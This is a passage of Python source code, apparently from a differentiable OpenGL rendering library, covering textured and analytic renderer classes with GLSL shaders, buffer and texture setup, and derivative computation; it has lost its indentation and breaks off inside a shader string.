[vbo.delete() for vbo in self.vbo_verts_mesh]
[vbo.set_array(np.array([])) for vbo in self.vbo_uvs_mesh]
[vbo.bind() for vbo in self.vbo_uvs_mesh]
[vbo.unbind() for vbo in self.vbo_uvs_mesh]
[vbo.delete() for vbo in self.vbo_uvs_mesh]
[GL.glDeleteVertexArrays(1, [vao.value]) for sublist in self.vao_tex_mesh_list for vao in sublist]
self.release_textures()
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
GL.glDeleteProgram(self.colorTextureProgram)
super().clear()
except:
pdb.set_trace()
print("Program had not been initialized")
def initGLTexture(self):
print("Initializing Texture OpenGL.")
GL.glLineWidth(1.)
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
//#extension GL_EXT_shader_image_load_store : enable
in vec3 theColor;
in vec2 UV;
uniform sampler2D myTextureSampler;
// Output data
out vec3 color;
void main(){
color = theColor * texture( myTextureSampler, UV ).rgb;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
layout(location = 2) in vec2 vertexUV;
uniform mat4 MVP;
out vec3 theColor;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
UV = vertexUV;
}""", GL.GL_VERTEX_SHADER)
self.colorTextureProgram = shaders.compileProgram(VERTEX_SHADER,FRAGMENT_SHADER)
#Define the other VAO/VBOs and shaders.
#Text VAO and bind color, vertex indices AND uvbuffer:
position_location = GL.glGetAttribLocation(self.colorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorTextureProgram, 'color')
uvs_location = GL.glGetAttribLocation(self.colorTextureProgram, 'vertexUV')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_texture_location = GL.glGetUniformLocation(self.colorTextureProgram, 'MVP')
self.vbo_indices_mesh_list = []
self.vbo_colors_mesh = []
self.vbo_verts_mesh = []
self.vao_tex_mesh_list = []
self.vbo_uvs_mesh = []
self.textureID_mesh_list = []
for mesh in range(len(self.f_list)):
vbo_verts = vbo.VBO(np.array(self.v_list[mesh]).astype(np.float32))
vbo_colors = vbo.VBO(np.array(self.vc_list[mesh]).astype(np.float32))
vbo_uvs = vbo.VBO(np.array(self.ft_list[mesh]).astype(np.float32))
self.vbo_colors_mesh = self.vbo_colors_mesh + [vbo_colors]
self.vbo_verts_mesh = self.vbo_verts_mesh + [vbo_verts]
self.vbo_uvs_mesh = self.vbo_uvs_mesh + [vbo_uvs]
vaos_mesh = []
vbo_indices_mesh = []
textureIDs_mesh = []
for polygons in range(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
vbo_indices = vbo.VBO(np.array(self.f_list[mesh][polygons]).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
vbo_indices.bind()
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
if self.haveUVs_list[mesh][polygons]:
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#Textures:
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = GL.GLuint(0)
GL.glGenTextures( 1, texture )
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
image = np.array(np.flipud((self.textures_list[mesh][polygons])), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
textureIDs_mesh = textureIDs_mesh + [texture]
vbo_indices_mesh = vbo_indices_mesh + [vbo_indices]
vaos_mesh = vaos_mesh + [vao]
self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs_mesh]
self.vao_tex_mesh_list = self.vao_tex_mesh_list + [vaos_mesh]
self.vbo_indices_mesh_list = self.vbo_indices_mesh_list + [vbo_indices_mesh]
GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glBindVertexArray(0)
self.textureID = GL.glGetUniformLocation(self.colorTextureProgram, "myTextureSampler")
# def __del__(self):
# pass
# # self.release_textures()
@property
def shape(self):
return (self.frustum['height'], self.frustum['width'], 3)
@property
def num_channels(self):
return 3
def release_textures(self):
if hasattr(self, 'textureID_mesh_list'):
if self.textureID_mesh_list != []:
for texture_mesh in self.textureID_mesh_list:
if texture_mesh != []:
for texture in texture_mesh:
if texture != None:
GL.glDeleteTextures(1, [texture.value])
self.textureID_mesh_list = []
def compute_r(self):
return self.color_image # .reshape((self.frustum['height'], self.frustum['width'], -1)).squeeze()
@depends_on(dterms+terms)
def color_image(self):
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image(with_vertex_colors=True, with_texture_on=True)
if not self.overdraw or self.msaa:
return no_overdraw
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
overdraw = self.draw_color_image()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# return overdraw * np.atleast_3d(self.boundarybool_image)
boundarybool_image = self.boundarybool_image
if self.num_channels > 1:
boundarybool_image = np.atleast_3d(boundarybool_image)
return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
def image_mesh_bool(self, meshes):
self.makeCurrentContext()
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for mesh in meshes:
self.draw_index(mesh)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['width'],3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result!=0
@depends_on(dterms+terms)
def indices_image(self):
self._call_on_changed()
self.makeCurrentContext()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for index in range(len(self.f_list)):
self.draw_index(index)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['width'],3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result
def draw_index(self, index):
mesh = index
vbo_color = self.vbo_colors_mesh[mesh]
vc = self.vc_list[mesh]
colors = np.array(np.ones_like(vc)*(index)/255.0, dtype=np.float32)
#Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, MVP)
GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
def draw_texcoord_image(self, v, f, ft, boundarybool_image=None):
# gl = glf
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
self.makeCurrentContext()
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# want vtc: texture-coordinates per vertex (not per element in vc)
colors = ft
#use the third channel to identify the corresponding textures.
color3 = np.vstack([np.ones([self.ft_list[mesh].shape[0],1])*mesh for mesh in range(len(self.ft_list))]).astype(np.float32) / len(self.ft_list)
colors = np.asarray(np.hstack((colors, color3)), np.float64, order='C')
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
#Why do we need this?
if boundarybool_image is not None:
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels( 0,0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'],self.frustum['width'],3)[:,:,:3].astype(np.float64))/255.0
result[:,:,1] = 1. - result[:,:,1]
return result
def compute_dr_wrt(self, wrt):
result = super().compute_dr_wrt(wrt)
if wrt is self.vc:
cim = self.draw_color_image(with_vertex_colors=False).ravel()
cim = sp.spdiags(row(cim), [0], cim.size, cim.size)
result = cim.dot(result)
elif wrt is self.texture_stack:
IS = np.nonzero(self.visibility_image.ravel() != 4294967295)[0]
texcoords, texidx = self.texcoord_image_quantized
vis_texidx = texidx.ravel()[IS]
vis_texcoords = texcoords.ravel()[IS]
JS = vis_texcoords * np.tile(col(vis_texidx), [1,2]).ravel()
clr_im = self.draw_color_image(with_vertex_colors=True, with_texture_on=False)
if False:
cv2.imshow('clr_im', clr_im)
# cv2.imshow('texmap', self.texture_image.r)
cv2.waitKey(1)
r = clr_im[:,:,0].ravel()[IS]
g = clr_im[:,:,1].ravel()[IS]
b = clr_im[:,:,2].ravel()[IS]
data = np.concatenate((r,g,b))
IS = np.concatenate((IS*3, IS*3+1, IS*3+2))
JS = np.concatenate((JS*3, JS*3+1, JS*3+2))
return sp.csc_matrix((data, (IS, JS)), shape=(self.r.size, wrt.r.size))
return result
def on_changed(self, which):
super().on_changed(which)
# have to redo if frustum changes, because a frustum change triggers a new context
# if 'frustum' in which:
if 'v' in which:
for mesh in range(len(self.f_list)):
self.vbo_verts_mesh[mesh].set_array(np.array(self.v_list[mesh]).astype(np.float32))
self.vbo_colors_mesh[mesh].set_array(np.array(self.vc_list[mesh]).astype(np.float32))
self.vbo_verts_mesh[mesh].bind()
self.vbo_colors_mesh[mesh].bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
if 'texture_stack' in which:
# gl = self.glf
# texture_data = np.array(self.texture_image*255., dtype='uint8', order='C')
# self.release_textures()
#
# for mesh in range(len(self.f_list)):
# textureIDs = []
# for polygons in range(len(self.f_list[mesh])):
# texture = None
# if self.haveUVs_list[mesh][polygons]:
# texture = GL.GLuint(0)
# GL.glGenTextures( 1, texture )
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# #Send texture.
# #Pol: Check if textures are float or uint from Blender import.
# image = (self.textures_list[mesh][polygons]*255.0).astype(np.uint8)
# GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, GL.GL_RGB8, image.shape[1], image.shape[0], 0, GL.GL_RGB, GL.GL_UNSIGNED_BYTE, image)
# textureIDs = textureIDs + [texture]
# self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs]
# gl.GenTextures(1, tmp) # TODO: free after done
# self.textureID = tmp[0]
if self.initialized:
textureCoordIdx = 0
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
#Update the OpenGL textures with all the textures. (Inefficient as many might not have changed).
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
self.textures_list[mesh][polygons] = self.texture_stack[textureCoordIdx:image.size+textureCoordIdx].reshape(image.shape)
textureCoordIdx = textureCoordIdx + image.size
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_UNSIGNED_BYTE,
image.ravel().tobytes())
@depends_on('ft', 'textures')
def mesh_tex_coords(self):
data = self.ft.copy()
# Flip V to match OpenGL's bottom-left texture origin (copy first so self.ft is not mutated in place).
data[:, 1] = 1.0 - data[:, 1]
return data
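# Sketch of the V flip above (hypothetical helper): OpenGL samples textures with
# the origin at the bottom-left while images are stored top-down, hence v -> 1 - v.
def _flip_v_sketch(uv):
    out = np.array(uv, dtype=np.float64)  # copy; leave the input untouched
    out[:, 1] = 1.0 - out[:, 1]
    return out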
# Depends on 'f' because vpe/fpe depend on f
# Pol: Check that depends on works on other attributes that depend_on x, if x changes.
@depends_on( 'ft', 'f')
def wireframe_tex_coords(self):
print("wireframe_tex_coords is being computed!")
vvt = np.zeros((self.v.r.size // 3, 2), dtype=np.float64, order='C')
vvt[self.f.flatten()] = self.mesh_tex_coords
edata = vvt[self.ma.ravel()]
return edata
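# Minimal sketch (hypothetical names) of the scatter performed above: per-face-corner
# values land in a per-vertex table; if corners disagree, the last write wins.
def _scatter_corners_sketch(f, corner_vals, n_verts):
    out = np.zeros((n_verts, corner_vals.shape[-1]))
    out[f.ravel()] = corner_vals.reshape(-1, corner_vals.shape[-1])
    return out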
# TODO: can this not be inherited from base? turning off texture mapping in that instead?
@depends_on(dterms+terms)
def boundaryid_image(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
def draw_color_image(self, with_vertex_colors=True, with_texture_on=True):
self.makeCurrentContext()
self._call_on_changed()
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
vbo_color = self.vbo_colors_mesh[mesh]
vc = self.vc_list[mesh]
colors = None
if with_vertex_colors:
colors = vc.r.astype(np.float32)
else:
#Only texture.
colors = np.ones_like(vc).astype(np.float32)
#Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
if with_texture_on and self.haveUVs_list[mesh][polygons]:
GL.glUseProgram(self.colorTextureProgram)
texture = self.textureID_mesh_list[mesh][polygons]
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureID, 0)
else:
GL.glUseProgram(self.colorProgram)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'], GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['width'], 3).astype(np.float64)) / 255.0
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0.,0.,0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1, 1, 3))  # background where visibility == 0xFFFFFFFF
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
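# The final compositing step above, as a standalone sketch (hypothetical helper):
# pixels whose visibility id equals 0xFFFFFFFF take the background image, the rest
# keep the rendered color.
def _composite_background_sketch(render, background, visibility):
    bg_px = np.tile(np.atleast_3d(visibility) == 4294967295, (1, 1, 3))
    return bg_px * background + (1 - bg_px) * render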
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image_quantized(self):
texcoord_image = self.texcoord_image[:,:, :2].copy()
#Temporary:
self.texture_image = self.textures_list[0][0].r.copy()
texcoord_image[:,:,0] *= self.texture_image.shape[1]-1
texcoord_image[:,:,1] *= self.texture_image.shape[0]-1
texture_idx = (self.texcoord_image[:,:,2]*len(self.ft_list)).astype(np.uint32)
texcoord_image = np.round(texcoord_image)
texcoord_image = texcoord_image[:,:,0] + texcoord_image[:,:,1]*self.texture_image.shape[1]
return texcoord_image, texture_idx
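# Standalone sketch of the quantization above (hypothetical helper): texture
# coordinates in [0, 1] are scaled to pixel indices, rounded, and flattened into
# a single linear texel index using the texture width as the row stride.
def _quantize_texcoords_sketch(uv, tex_h, tex_w):
    q = np.array(uv, dtype=np.float64)
    q[..., 0] *= tex_w - 1
    q[..., 1] *= tex_h - 1
    q = np.round(q)
    return q[..., 0] + q[..., 1] * tex_w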
def checkBufferNum(self):
    # Sanity check: allocating a buffer verifies the GL context is still alive.
    GL.glGenBuffers(1)
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image(self):
return self.draw_texcoord_image(self.v.r, self.f, self.ft, self.boundarybool_image if self.overdraw else None)
class AnalyticRenderer(ColoredRenderer):
terms = 'f', 'frustum', 'vt', 'ft', 'background_image', 'overdraw', 'ft_list', 'haveUVs_list', 'textures_list', 'vc_list' , 'imageGT'
dterms = 'vc', 'camera', 'bgcolor', 'texture_stack', 'v'
def __init__(self):
super().__init__()
def clear(self):
try:
GL.glFlush()
GL.glFinish()
# print ("Clearing textured renderer.")
# for msh in self.vbo_indices_mesh_list:
# for vbo in msh:
# vbo.set_array([])
for buffers in (self.vbo_indices_mesh_list, self.vbo_colors_mesh, self.vbo_verts_mesh, self.vbo_uvs_mesh, self.vbo_face_ids_list):
    for sublist in buffers:
        for vbo in sublist:
            vbo.set_array(np.array([]))
            vbo.bind()
            vbo.unbind()
            vbo.delete()
for sublist in self.vao_tex_mesh_list:
    for vao in sublist:
        GL.glDeleteVertexArrays(1, [vao.value])
self.release_textures()
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
GL.glDeleteProgram(self.colorTextureProgram)
super().clear()
except Exception:
import pdb
pdb.set_trace()
print("Program had not been initialized")
def initGLTexture(self):
print("Initializing Texture OpenGL.")
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
//#extension GL_EXT_shader_image_load_store : enable
in vec3 theColor;
in vec2 UV;
uniform sampler2D myTextureSampler;
// Output data
out vec3 color;
void main(){
color = theColor * texture( myTextureSampler, UV ).rgb;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
layout(location = 2) in vec2 vertexUV;
uniform mat4 MVP;
out vec3 theColor;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
UV = vertexUV;
}""", GL.GL_VERTEX_SHADER)
self.colorTextureProgram = shaders.compileProgram(VERTEX_SHADER,FRAGMENT_SHADER)
# Define the other VAOs/VBOs and shaders.
# Texture VAO: bind the color, vertex-index and UV buffers:
position_location = GL.glGetAttribLocation(self.colorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorTextureProgram, 'color')
uvs_location = GL.glGetAttribLocation(self.colorTextureProgram, 'vertexUV')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_texture_location = GL.glGetUniformLocation(self.colorTextureProgram, 'MVP')
self.vbo_indices_mesh_list = []
self.vbo_colors_mesh = []
self.vbo_verts_mesh = []
self.vao_tex_mesh_list = []
self.vbo_uvs_mesh = []
self.textureID_mesh_list = []
# GL.glEnable(GL.GL_LINE_SMOOTH)
# GL.glHint(GL.GL_LINE_SMOOTH_HINT, GL.GL_NICEST)
GL.glLineWidth(2.)
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_indices_mesh = []
vbo_face_ids_mesh = []
vbo_colors_mesh = []
vbo_vertices_mesh = []
vbo_uvs_mesh = []
textureIDs_mesh = []
for polygons in range(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_verts = vbo.VBO(np.array(verts_by_face).astype(np.float32))
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_colors = vbo.VBO(np.array(colors_by_face).astype(np.float32))
uvs_by_face = np.asarray(self.ft_list[mesh].reshape((-1, 2))[f.ravel()], dtype=np.float32, order='C')
vbo_uvs = vbo.VBO(np.array(uvs_by_face).astype(np.float32))
vbo_indices = vbo.VBO(np.array(self.f_list[mesh][polygons]).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
vbo_indices.bind()
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 1' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
if self.haveUVs_list[mesh][polygons]:
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location) # from 'location = 2' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#Textures:
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = GL.GLuint(0)
GL.glGenTextures( 1, texture )
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
image = np.array(np.flipud((self.textures_list[mesh][polygons])), order='C', dtype=np.float32)
GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGB32F, image.shape[1], image.shape[0])
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
textureIDs_mesh.append(texture)
vbo_indices_mesh.append(vbo_indices)
vbo_colors_mesh.append(vbo_colors)
vbo_vertices_mesh.append(vbo_verts)
vbo_uvs_mesh.append(vbo_uvs)
vaos_mesh.append(vao)
self.textureID_mesh_list.append(textureIDs_mesh)
self.vao_tex_mesh_list.append(vaos_mesh)
self.vbo_indices_mesh_list.append(vbo_indices_mesh)
self.vbo_colors_mesh.append(vbo_colors_mesh)
self.vbo_verts_mesh.append(vbo_vertices_mesh)
self.vbo_uvs_mesh.append(vbo_uvs_mesh)
GL.glBindTexture(GL.GL_TEXTURE_2D, 0)
GL.glBindVertexArray(0)
self.textureID = GL.glGetUniformLocation(self.colorTextureProgram, "myTextureSampler")
def initGL_AnalyticRenderer(self):
self.initGLTexture()
self.updateRender = True
self.updateDerivatives = True
GL.glEnable(GL.GL_MULTISAMPLE)
# GL.glHint(GL.GL_MULTISAMPLE_FILTER_HINT_NV, GL.GL_NICEST);
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 colorIn;
layout(location = 2) in vec2 vertexUV;
layout(location = 3) in uint face_id;
layout(location = 4) in vec3 barycentric;
uniform mat4 MVP;
out vec3 theColor;
out vec4 pos;
flat out uint face_out;
out vec3 barycentric_vert_out;
out vec2 UV;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
pos = MVP * vec4(position,1);
//pos = pos4.xyz;
theColor = colorIn;
UV = vertexUV;
face_out = face_id;
barycentric_vert_out = barycentric;
}""", GL.GL_VERTEX_SHADER)
ERRORS_FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
